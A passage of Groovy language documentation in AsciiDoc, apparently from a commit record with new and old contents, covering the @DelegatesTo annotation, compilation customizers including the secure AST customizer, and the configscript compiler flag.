(because\nit\u2019s very likely that it will break at runtime).\n\nOne more problem with the code above is that it is not compatible with static type checking. Type checking would let\nthe user know if a method call is authorized at compile time instead of runtime, but if you try to perform type\nchecking on this code:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_builder_usage,indent=0]\n---------------------------------------\n\nThen the type checker will know that there\u2019s an\u00a0`email` method accepting\na\u00a0`Closure`, but it will complain for every method call\u00a0*inside* the\nclosure, because\u00a0`from`, for example, is not a method which is defined\nin the class. Indeed, it\u2019s defined in the\u00a0`EmailSpec` class and it has\nabsolutely no hint to help it knowing that the closure delegate will, at\nruntime, be of type\u00a0`EmailSpec`:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=sendmail_typechecked_nodelegatesto,indent=0]\n---------------------------------------\n\nwill fail compilation with errors like this one:\n\n----\n[Static type checking] - Cannot find matching method MyScript#from(java.lang.String). Please check if the declared type is right and if the method exists.\n @ line 31, column 21.\n from 'dsl-guru@mycompany.com'\n----\n\n[[TheDelegatesToannotation-DelegatesTo]]\n=== @DelegatesTo\n\nFor those reasons, Groovy 2.1 introduced a new annotation\nnamed\u00a0`@DelegatesTo`. The goal of this annotation is to solve both the\ndocumentation issue, that will let your IDE know about the expected\nmethods in the closure body, and it will also solve the type checking\nissue, by giving hints to the compiler about what are the potential\nreceivers of method calls in the closure body.\n\nThe idea is to annotate the\u00a0`Closure` parameter of the\u00a0`email` method:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_method_delegatesto,indent=0]\n---------------------------------------\n\nWhat we\u2019ve done here is telling the compiler (or the IDE) that when the\nmethod will be called with a closure, the delegate of this closure will\nbe set to an object of type\u00a0`email`. But there is still a problem: the\ndefaut delegation strategy is not the one which is used in our method.\nSo we will give more information and tell the compiler (or the IDE) that\nthe delegation strategy is also changed:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_method_delegatesto_strategy,indent=0]\n---------------------------------------\n\nNow, both the IDE and the type checker (if you are using `@TypeChecked`)\nwill be aware of the delegate and the delegation strategy. This is very\nnice because it will both allow the IDE to provide smart completion, but\nit will also remove errors at compile time that exist only because the\nbehaviour of the program is normally only known at runtime!\n\nThe following code will now pass compilation:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=sendmail_typechecked_pass,indent=0]\n---------------------------------------\n\n[[TheDelegatesToannotation-DelegatesTomodes]]\n=== DelegatesTo modes\n\n`@DelegatesTo` supports multiple modes that we will describe with examples\nin this section.\n\n[[TheDelegatesToannotation-Simpledelegation]]\n==== Simple delegation\n\nIn this mode, the only mandatory parameter is the\u00a0_value_ which says to\nwhich class we delegate calls. Nothing more. We\u2019re telling the compiler\nthat the type of the delegate will\u00a0*always* be of the type documented\nby\u00a0`@DelegatesTo` (note that it can be a subclass, but if it is, the\nmethods defined by the subclass will not be visible to the type\nchecker).\n\n[source,groovy]\n-----------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=simple_delegation,indent=0]\n-----------------------------------------------\n\n[[TheDelegatesToannotation-Delegationstrategy]]\n==== Delegation strategy\n\nIn this mode, you must specify both the delegate class\u00a0*and* a\ndelegation strategy. This must be used if the closure will not be called\nwith the default delegation strategy, which is\u00a0`Closure.OWNER_FIRST`.\n\n[source,groovy]\n----------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=delegation_with_strategy,indent=0]\n----------------------------------------------------------------------------------\n\n[[TheDelegatesToannotation-Delegatetoparameter]]\n==== Delegate to parameter\n\nIn this variant, we will tell the compiler that we are delegating to\nanother parameter of the method. Take the following code:\n\n[source,groovy]\n-------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=exec_method_no_delegatesto,indent=0]\n-------------------------------------------------\n\nHere, the delegate which will be used is\u00a0*not* created inside the\u00a0`exec`\nmethod. In fact, we take an argument of the method and delegate to it.\nUsage may look like this:\n\n[source,groovy]\n-----------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=exec_usage,indent=0]\n-----------------------\n\nEach of the method calls are delegated to the\u00a0`email` parameter. This is\na widely used pattern which is also supported by\u00a0`@DelegatesTo` using a\ncompanion annotation:\n\n[source,groovy]\n---------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=exec_method_with_delegatesto,indent=0]\n---------------------------------------------------------------\n\nA closure is annotated with\u00a0`@DelegatesTo`, but this time, without\nspecifying any class. Instead, we\u2019re annotating another parameter\nwith\u00a0`@DelegatesTo.Target`. The type of the delegate is then determined\nat compile time. One could think that we are using the parameter type,\nwhich in this case is\u00a0`Object` but this is not true. Take this code:\n\n[source,groovy]\n--------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=delegatesto_flow_typing_header,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=delegatesto_flow_typing_footer,indent=0]\n--------------------------------------\n\nRemember that this works out of the box\u00a0*without* having to annotate\nwith\u00a0`@DelegatesTo`. However, to make the IDE aware of the delegate\ntype, or the\u00a0*type checker* aware of it, we need to add\u00a0`@DelegatesTo`.\nAnd in this case, it will now that the\u00a0`Greeter` variable is of\ntype\u00a0`Greeter`, so it will not report errors on the\u00a0_sayHello_\nmethod\u00a0*even if the exec method doesn\u2019t explicitely define the target as\nof type Greeter*. This is a very powerful feature, because it prevents\nyou from writing multiple versions of the same\u00a0`exec` method for\ndifferent receiver types!\n\nIn this mode, the\u00a0`@DelegatesTo` annotation also supports the\u00a0`strategy`\nparameter that we\u2019ve described upper.\n\n[[TheDelegatesToannotation-Multipleclosures]]\n==== Multiple closures\n\nIn the previous example, the\u00a0`exec` method accepted only one closure,\nbut you may have methods that take multiple closures:\n\n[source,groovy]\n--------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_method_no_delegatesto,indent=0]\n--------------------------------------------------------------------\n\nThen nothing prevents you from annotating each closure\nwith\u00a0`@DelegatesTo`:\n\n[source,groovy]\n--------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_classes,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_method_header,indent=0]\n ...\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_method_footer,indent=0]\n--------------------------------------------------------------------\n\nBut more importantly, if you have multiple closures\u00a0*and* multiple\narguments, you can use several targets:\n\n[source,groovy]\n-----------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_multitarget,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=multitarget_test,indent=0]\n-----------------------------------------------------------------------------\n\nNOTE: At this point, you may wonder why we don\u2019t use the parameter names as\nreferences. The reason is that the information (the parameter name) is\nnot always available (it\u2019s a debug-only information), so it\u2019s a\nlimitation of the JVM.\n\n==== Delegating to a generic type\n\nIn some situations, it is interesting to instruct the IDE or the compiler that the delegate type will not be a parameter\nbut a generic type. Imagine a configurator that runs on a list of elements:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=configure_list_method,indent=0]\n----\n\nThen this method can be called with any list like this:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=configure_list_usage,indent=0]\n----\n\nTo let the type checker and the IDE know that the `configure` method calls the closure on each element of the list, you\n need to use `@DelegatesTo` differently:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=configure_list_with_delegatesto,indent=0]\n----\n\n`@DelegatesTo` takes an optional `genericTypeIndex` argument that tells what is the index of the generic type that will\nbe used as the delegate type. This *must* be used in conjunction with `@DelegatesTo.Target` and the index starts at 0. In\nthe example above, that means that the delegate type is resolved against `List<T>`, and since the generic type at index\n0 is `T` and inferred as a `Realm`, the type checker infers that the delegate type will be of type `Realm`.\n\nNOTE: We're using a `genericTypeIndex` instead of a placeholder (`T`) because of JVM limitations.\n\n[[compilation-customizers]]\n== Compilation customizers\n=== Introduction\n\nWhether you are using\u00a0`groovyc` to compile classes or a\u00a0`GroovyShell`,\nfor example, to execute scripts, under the hood, a _compiler configuration_ is used. This configuration holds information\nlike the source encoding or the classpath but it can also be used to perform more operations like adding imports by\ndefault, applying AST transformations transparently or disabling global AST transformations.\n\nThe goal of compilation customizers is to make those common tasks easy to implement. For that, the\u00a0`CompilerConfiguration`\nclass is the entry point. The general schema will always be based on the following code:\n\n[source,groovy]\n--------------------------------------------------------\nimport org.codehaus.groovy.control.CompilerConfiguration\n\/\/ create a configuration\ndef config = new CompilerConfiguration()\n\/\/ tweak the configuration\nconfig.addCompilationCustomizers(...)\n\/\/ run your script\ndef shell = new GroovyShell(config)\nshell.evaluate(script)\n--------------------------------------------------------\n\nCompilation customizers must extend the\u00a0_org.codehaus.groovy.control.customizers.CompilationCustomizer_ class. A customizer works:\n\n* on a specific compilation phase\n* on\u00a0_every_ class node being compiled\n\nYou can implement your own compilation customizer but Groovy includes some of the most common operations.\n\n=== Import customizer\n\nUsing this compilation customizer, your code will have imports added\ntransparently. This is in particular useful for scripts implementing a\nDSL where you want to avoid users from having to write imports. The\nimport customizer will let you add all the variants of imports the\nGroovy language allows, that is:\n\n* class imports, optionally aliased\n* star imports\n* static imports, optionally aliased\n* static star imports\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.ImportCustomizer\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=import_cz,indent=0]\n-----------------------------------------------------------------------------------------------------\n\nA detailed description of all shortcuts can be found in gapi::org.codehaus.groovy.control.customizers.ImportCustomizer\n\n=== AST transformation customizer\n\nThe AST transformation customizer is meant to apply AST transformations\ntransparently. Unlike global AST transformations that apply on every\nclass beeing compiled as long as the transform is found on classpath\n(which has drawbacks like increasing the compilation time or side\neffects due to transformations applied where they should not), the\ncustomizer will allow you to selectively apply a transform only for\nspecific scripts or classes.\n\nAs an example, let\u2019s say you want to be able to use\u00a0`@Log` in a script.\nThe problem is that\u00a0`@Log` is normally applied on a class node and a\nscript, by definition, doesn\u2019t require one. But implementation wise,\nscripts are classes, it\u2019s just that you cannot annotate this implicit\nclass node with\u00a0`@Log`. Using the AST customizer, you have a workaround\nto do it:\n\n[source,groovy]\n--------------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.ASTTransformationCustomizer\nimport groovy.util.logging.Log\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=ast_cz_simple,indent=0]\n--------------------------------------------------------------------------\n\nThat\u2019s all! Internally, the\u00a0`@Log` AST transformation is applied to\nevery class node in the compilation unit. This means that it will be\napplied to the script, but also to classes defined within the script.\n\nIf the AST transformation that you are using accepts parameters, you can\nuse parameters in the constructor too:\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=ast_cz_customname,indent=0]\n-----------------------------------------------------------------------------------------------------------------\n\nAs the AST transformation customizers works with objects instead of AST\nnodes, not all values can be converted to AST transformation parameters.\nFor example, primitive types are converted to\u00a0`ConstantExpression` (that\nis `LOGGER` is converted to\u00a0`new ConstantExpression('LOGGER')`, but if\nyour AST transformation takes a closure as an argument, then you have to\ngive it a\u00a0`ClosureExpression`, like in the following example:\n\n[source,groovy]\n--------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=ast_cz_closure,indent=0]\n--------------------------------------------------------------------------------------------------------------\n\nFor a complete list of options, please refer to gapi::org.codehaus.groovy.control.customizers.ASTTransformationCustomizer\n\n=== Secure AST customizer\n\nThis customizer will allow the developer of a DSL to restrict the\n*grammar* of the language, to prevent users from using some constructs,\nfor example. It is only ``secure'' in that sense only and it is very\nimportant to understand that it does\u00a0*not* replace a security manager.\nThe only reason for it to exist is to limit the expressiveness of the\nlanguage. This customizer only works at the AST (abstract syntax tree)\nlevel, not at runtime! It can be strange at first glance, but it makes\nmuch more sense if you think of Groovy as a platform to build DSLs. You\nmay not want a user to have a complete language at hand. In the example\nbelow, we will demonstrate it using an example of language that only\nallows arithmetic operations, but this customizer allows you to:\n\n* allow\/disallow creation of closures\n* allow\/disallow imports\n* allow\/disallow package definition\n* allow\/disallow definition of methods\n* restrict the receivers of method calls\n* restrict the kind of AST expressions a user can use\n* restrict the tokens (grammar-wise) a user can use\n* restrict the types of the constants that can be used in code\n\nFor all those features, the secure AST customizer works using either a\nwhitelist (list of elements that are allowed)\u00a0*or* a blacklist (list of\nelements that are disallowed). For each type of feature (imports,\ntokens, \u2026) you have the choice to use either a whitelist or a blacklist,\nbut you can mix whitelists and blacklists for distinct features. In\ngeneral, you will choose whitelists (disallow all, allow selected).\n\n[source,groovy]\n-------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.SecureASTCustomizer\nimport static org.codehaus.groovy.syntax.Types.* <1>\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=secure_cz,indent=0]\n-------------------------------------------------------------------------------------\n<1> use for token types from gapi::org.codehaus.groovy.syntax.Types\n<2> you can use class literals here\n\nIf what the secure AST customizer provides out of the box isn\u2019t enough\nfor your needs, before creating your own compilation customizer, you\nmight be interested in the expression and statement checkers that the\nAST customizer supports. Basically, it allows you to add custom checks\non the AST tree, on expressions (expression checkers) or statements\n(statement checkers). For this, you must\nimplement\u00a0`org.codehaus.groovy.control.customizers.SecureASTCustomizer.StatementChecker`\nor\u00a0`org.codehaus.groovy.control.customizers.SecureASTCustomizer.ExpressionChecker`.\n\nThose interfaces define a single method called\u00a0`isAuthorized`, returning\na boolean, and taking a\u00a0`Statement` (or\u00a0`Expression`) as a parameter. It\nallows you to perform complex logic over expressions or statements to\ntell if a user is allowed to do it or not.\n\nFor example, there's no predefined configuration flag in the customizer which\nwill let you prevent people from using an attribute expression. Using a custom\nchecker, it is trivial:\n\n[source,groovy]\n----------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=secure_cz_custom,indent=0]\n----------------------------------------------------------------------\n\nThen we can make sure that this works by evaluating a simple script:\n\n[source,groovy]\n----\nnew GroovyShell(config).evaluate '''\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=secure_cz_custom_assert,indent=4]\n'''\n----\n<1> will fail compilation\n\nStatements can be checked using gapi::org.codehaus.groovy.control.customizers.SecureASTCustomizer.StatementChecker\nExpressions can be checked using gapi::org.codehaus.groovy.control.customizers.SecureASTCustomizer.ExpressionChecker\n\n=== Source aware customizer\n\nThis customizer may be used as a filter on other customizers. The\nfilter, in that case, is the\u00a0`org.codehaus.groovy.control.SourceUnit`.\nFor this, the source aware customizer takes another customizer as a\ndelegate, and it will apply customization of that delegate only and only\nif predicates on the source unit match.\n\n`SourceUnit` gives you access to multiple things but in particular the\nfile being compiled (if compiling from a file, of course). It gives\nyou the potential to perform operation based on the file name, for\nexample. Here is how you would create a source aware customizer:\n\n[source,groovy]\n--------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.SourceAwareCustomizer\nimport org.codehaus.groovy.control.customizers.ImportCustomizer\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=source_cz,indent=0]\n--------------------------------------------------------------------\n\nThen you can use predicates on the source aware customizer:\n\n[source,groovy]\n--------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=source_cz_predicates,indent=0]\n--------------------------------------------------------------------------\n\n=== Customizer builder\n\nIf you are using compilation customizers in Groovy code (like the\nexamples above) then you can use an alternative syntax to customize compilation.\nA builder\u00a0(`org.codehaus.groovy.control.customizers.builder.CompilerCustomizationBuilder`)\nsimplifies the creation of customizers using a hierarchical DSL.\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.CompilerConfiguration\nimport static org.codehaus.groovy.control.customizers.builder.CompilerCustomizationBuilder.withConfig <1>\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=customizer_withconfig,indent=0]\n-----------------------------------------------------------------------------------------------------\n<1> static import of the builder method\n<2> configuration goes here\n\nThe code sample above shows how to use the builder. A static\nmethod,\u00a0_withConfig_, takes a closure corresponding to the builder code,\nand automatically registers compilation customizers to the\nconfiguration. Every compilation customizer available in the distribution\ncan be configured this way:\n\n==== Import customizer\n\n[source,groovy]\n----------------------------------------------------------------------------------\nwithConfig(configuration) {\n imports { \/\/ imports customizer\n normal 'my.package.MyClass' \/\/ a normal import\n alias 'AI', 'java.util.concurrent.atomic.AtomicInteger' \/\/ an aliased import\n star 'java.util.concurrent' \/\/ star imports\n staticMember 'java.lang.Math', 'PI' \/\/ static import\n staticMember 'pi', 'java.lang.Math', 'PI' \/\/ aliased static import\n }\n}\n----------------------------------------------------------------------------------\n\n==== AST transformation customizer\n\n[source,groovy]\n-------------------------------------------\nwithConfig(conf) {\n ast(Log) <1>\n}\n\nwithConfig(conf) {\n ast(Log, value: 'LOGGER') <2>\n}\n-------------------------------------------\n<1> apply @Log transparently\n<2> apply @Log with a different name for the logger\n\n==== Secure AST customizer\n\n[source,groovy]\n--------------------------------------\nwithConfig(conf) {\n secureAst {\n closuresAllowed = false\n methodDefinitionAllowed = false\n }\n}\n--------------------------------------\n\n==== Source aware customizer\n\n[source,groovy]\n--------------------------------------------------------------------------------------\nwithConfig(configuration){\n source(extension: 'sgroovy') {\n ast(CompileStatic) <1>\n }\n}\n\nwithConfig(configuration){\n source(extensions: ['sgroovy','sg']) {\n ast(CompileStatic) <2>\n }\n}\n\nwithConfig(configuration) {\n source(extensionValidator: { it.name in ['sgroovy','sg']}) {\n ast(CompileStatic) <2>\n }\n}\n\nwithConfig(configuration) {\n source(basename: 'foo') {\n ast(CompileStatic) <3>\n }\n}\n\nwithConfig(configuration) {\n source(basenames: ['foo', 'bar']) {\n ast(CompileStatic) <4>\n }\n}\n\nwithConfig(configuration) {\n source(basenameValidator: { it in ['foo', 'bar'] }) {\n ast(CompileStatic) <4>\n }\n}\n\nwithConfig(configuration) {\n source(unitValidator: { unit -> !unit.AST.classes.any { it.name == 'Baz' } }) {\n ast(CompileStatic) <5>\n }\n}\n--------------------------------------------------------------------------------------\n<1> apply CompileStatic AST annotation on .sgroovy files\n<2> apply CompileStatic AST annotation on .sgroovy or .sg files\n<3> apply CompileStatic AST annotation on files whose name is 'foo'\n<4> apply CompileStatic AST annotation on files whose name is 'foo' or 'bar'\n<5> apply CompileStatic AST annotation on files that do not contain a class named 'Baz'\n\n==== Inlining a customizer\n\nInlined customizer allows you to write a compilation customizer\ndirectly, without having to create a class for it.\n\n[source,groovy]\n--------------------------------------------------------------\nwithConfig(configuration) {\n inline(phase:'CONVERSION') { source, context, classNode -> <1>\n println \"visiting $classNode\" <2>\n }\n}\n--------------------------------------------------------------\n<1> define an inlined customizer which will execute at the CONVERSION phase\n<2> prints the name of the class node being compiled\n\n==== Multiple customizers\n\nOf course, the builder allows you to define multiple customizers at\nonce:\n\n[source,groovy]\n---------------------------\nwithConfig(configuration) {\n ast(ToString)\n ast(EqualsAndHashCode)\n}\n---------------------------\n\n=== Config script flag\n\nSo far, we have described how you can customize compilation using\na\u00a0`CompilationConfiguration` class, but this is only possible if you\nembed Groovy and that you create your own instances\nof\u00a0`CompilerConfiguration` (then use it to create a\n`GroovyShell`,\u00a0`GroovyScriptEngine`, \u2026).\n\nIf you want it to be applied on the classes you compile with the normal\nGroovy compiler (that is to say with \u00a0`groovyc`,\u00a0`ant` or\u00a0`gradle`,\nfor example), it is possible to use a compilation flag named\u00a0`configscript`\nthat takes a Groovy configuration script as argument.\n\nThis script gives you access to the\u00a0`CompilerConfiguration` instance\u00a0*before*\nthe files are compiled (exposed into the configuration script as a variable named `configuration`),\nso that you can tweak it.\n\nIt also transparently integrates the compiler configuration builder above. As an example, let's see\nhow you would activate static compilation by default on all classes.\n\n==== Static compilation by default\n\nNormally, classes in Groovy are compiled with a dynamic runtime. You can activate static compilation\nby placing an annotation named `@CompileStatic` on any class. Some people would like to have this\nmode activated by default, that is to say not having to annotated classes. Using `configscript`,\nthis is possible. First of all, you need to create a file named `config.groovy` into `src\/conf` with\nthe following contents:\n\n[source,groovy]\n--------------------------------------\nwithConfig(configuration) { <1>\n ast(groovy.transform.CompileStatic)\n}\n--------------------------------------\n<1> _configuration_ references a `CompilerConfiguration` instance\n\nThat is actually all you need. You don\u2019t have to import the builder, it\u2019s automatically\nexposed in the script. Then, compile your files using the following command line:\n\n---------------------------------------------------------------------------\ngroovyc -configscript src\/conf\/config.groovy src\/main\/groovy\/MyClass.groovy\n---------------------------------------------------------------------------\n\nWe strongly recommand you to separate configuration files from classes,\nhence why we suggest using the `src\/main` and `src\/conf` directories above.\n\n=== AST transformations (TBD)\n== Custom type checking extensions (TBD)\n== Builders (TBD)\n=== Creating a builder (TBD)\n==== BuilderSupport (TBD)\n==== FactoryBuilderSupport (TBD)\n=== Existing builders (TBD)\n==== MarkupBuilder (TBD) - assigned to JNorthr 1July14\n==== StreamingMarkupBuilder (TBD)\n==== SaxBuilder (TBD)\n==== StaxBuilder (TBD)\n==== DomBuilder (TBD)\n==== NodeBuilder (TBD)\n==== JsonBuilder (TBD)\n==== StreamingJsonBuilder (TBD)\n==== SwingBuilder (TBD)\n==== AntBuilder (TBD)\n==== CliBuilder (TBD)\n==== ObjectGraphBuilder (TBD)\n","old_contents":"= Domain-Specific Languages\n\n== Command chains\n\nGroovy lets you omit parentheses around the arguments of a\nmethod call for top-level statements. ``command chain'' feature extends this by allowing us to chain such\nparentheses-free method calls, requiring neither parentheses around arguments, nor dots between the chained calls.\nThe general idea is that a call like `a b c d` will actually be equivalent to `a(b).c(d)`. This\nalso works with multiple arguments, closure arguments, and even named arguments. Furthermore, such command chains can\nalso appear on the right-hand side of assignments. Let\u2019s have a look at some examples\nsupported by this new syntax:\n\n[source,groovy]\n---------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_1,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_2,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_3,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_4,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_5,indent=0]\n---------------------------------------------------------------------------------------------------------------\n\nIt is also possible to use methods in the chain which take no arguments,\nbut in that case, the parentheses are needed:\n\n[source,groovy]\n-------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_6,indent=0]\n-------------------------------------------------------------------------------------------------\n\nIf your command chain contains an odd number of elements, the chain will\nbe composed of method \/ arguments, and will finish by a final property\naccess:\n\n[source,groovy]\n-------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_7,indent=0]\n-------------------------------------------------------------------------------------\n\nThis command chain approach opens up interesting possibilities in terms of the much wider range of DSLs which\ncan now be written in Groovy.\n\nThe above examples illustrate using a command chain based DSL but not how to create one. There are various strategies\nthat you can use, but to illustrate creating such a DSL, we will show a couple of examples - first using maps and Closures:\n\n[source,groovy]\n------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl1,indent=0]\n------------------------------------------------------------------------------------------------------\n\nAs a second example, consider how you might write a DSL for simplifying\none of your existing APIs. Maybe you need to put this code in front of\ncustomers, business analysts or testers who might be not hard-core Java\ndevelopers. We\u2019ll use the `Splitter` from the Google\nhttp:\/\/code.google.com\/p\/guava-libraries\/[Guava libraries] project as it\nalready has a nice Fluent API. Here is how we might use it out of the\nbox:\n\n[source,groovy]\n----------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl2,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl2_assert,indent=0]\n----------------------------------------------------------------------------------------------------------------\n\nIt reads fairly well for a Java developer but if that is not your target\naudience or you have many such statements to write, it could be\nconsidered a little verbose. Again, there are many options for writing a\nDSL. We\u2019ll keep it simple with Maps and Closures. We\u2019ll first write a\nhelper method:\n\n[source,groovy]\n------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl3,indent=0]\n------------------------------------------------------------------------------------------------------\n\nnow instead of this line from our original example:\n\n[source,groovy]\n----------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl2_assert,indent=0]\n----------------------------------------------------------------------------------------------------------------\n\nwe can write this:\n\n[source,groovy]\n-----------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl3_assert,indent=0]\n-----------------------------------------------------\n\n\n== Operator overloading (TBD)\n== Script base classes (TBD)\n== Adding properties to numbers (TBD)\n[[section-delegatesto]]\n== @DelegatesTo\n\n[[TheDelegatesToannotation-DSLsmadeeasy]]\n=== Explaining delegation strategy at compile time\n\n`@groovy.lang.DelegatesTo` is a documentation and compile-time annotation aimed at:\n\n * documenting APIs that use closures as arguments\n * providing type information for the static type checker and compiler\n\nThe Groovy language is a platform of choice for building DSLs. Using\nclosures, it\u2019s quite easy to create custom control structures, as well\nas it is simple to create builders. Imagine that you have the following\ncode:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_builder_usage,indent=0]\n---------------------------------------\n\nOne way of implementing this is using the builder strategy, which\nimplies a method, named `email`\u00a0which accepts a closure as an argument.\nThe method may delegate subsequent calls to an object that implements\nthe\u00a0`from`,\u00a0`to`,\u00a0`subject` and\u00a0`body` methods. Again,\u00a0`body` is a\nmethod which accepts a closure as an argument and that uses the builder\nstrategy.\n\nImplementing such a builder is usually done the following way:\n\n[source,groovy]\n----------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_method_no_delegatesto,indent=0]\n----------------------------------------------\n\nthe `EmailSpec` class implements the\u00a0`from`,\u00a0`to`, \u2026 methods. By\ncalling\u00a0`rehydrate`, we\u2019re creating a copy of the closure for which we\nset the\u00a0`delegate`,\u00a0`owner` and\u00a0`thisObject` values. Setting the owner\nand the `this` object is not very important here since we will use the\n`DELEGATE_ONLY` strategy which says that the method calls will be\nresolved only against the delegate of the closure.\n\n[source,groovy]\n----------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=emailspec_no_delegatesto,indent=0]\n----------------------------------------------\n\nThe `EmailSpec` class has itself a `body` method accepting a closure that is cloned and executed. This is what\nwe call the builder pattern in Groovy.\n\nOne of the problems with the code that we\u2019ve shown is that the user of\nthe `email` method doesn\u2019t have any information about the methods that\nhe\u2019s allowed to call inside the closure. The only possible information\nis from the method documentation. There are two issues with this: first\nof all, documentation is not always written, and if it is, it\u2019s not\nalways available (javadoc not downloaded, for example). Second, it\ndoesn\u2019t help IDEs. What would be really interesting, here, is for IDEs\nto help the developer by suggesting, once they are in the closure body,\nmethods that exist on the `email` class.\n\nMoreover, if the user calls a method in the closure which is not defined\nby the\u00a0`EmailSpec` class, the IDE should at least issue a warning (because\nit\u2019s very likely that it will break at runtime).\n\nOne more problem with the code above is that it is not compatible with static type checking. Type checking would let\nthe user know if a method call is authorized at compile time instead of runtime, but if you try to perform type\nchecking on this code:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_builder_usage,indent=0]\n---------------------------------------\n\nThen the type checker will know that there\u2019s an\u00a0`email` method accepting\na\u00a0`Closure`, but it will complain for every method call\u00a0*inside* the\nclosure, because\u00a0`from`, for example, is not a method which is defined\nin the class. Indeed, it\u2019s defined in the\u00a0`EmailSpec` class and it has\nabsolutely no hint to help it knowing that the closure delegate will, at\nruntime, be of type\u00a0`EmailSpec`:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=sendmail_typechecked_nodelegatesto,indent=0]\n---------------------------------------\n\nwill fail compilation with errors like this one:\n\n----\n[Static type checking] - Cannot find matching method MyScript#from(java.lang.String). Please check if the declared type is right and if the method exists.\n @ line 31, column 21.\n from 'dsl-guru@mycompany.com'\n----\n\n[[TheDelegatesToannotation-DelegatesTo]]\n=== @DelegatesTo\n\nFor those reasons, Groovy 2.1 introduced a new annotation\nnamed\u00a0`@DelegatesTo`. The goal of this annotation is to solve both the\ndocumentation issue, that will let your IDE know about the expected\nmethods in the closure body, and it will also solve the type checking\nissue, by giving hints to the compiler about what are the 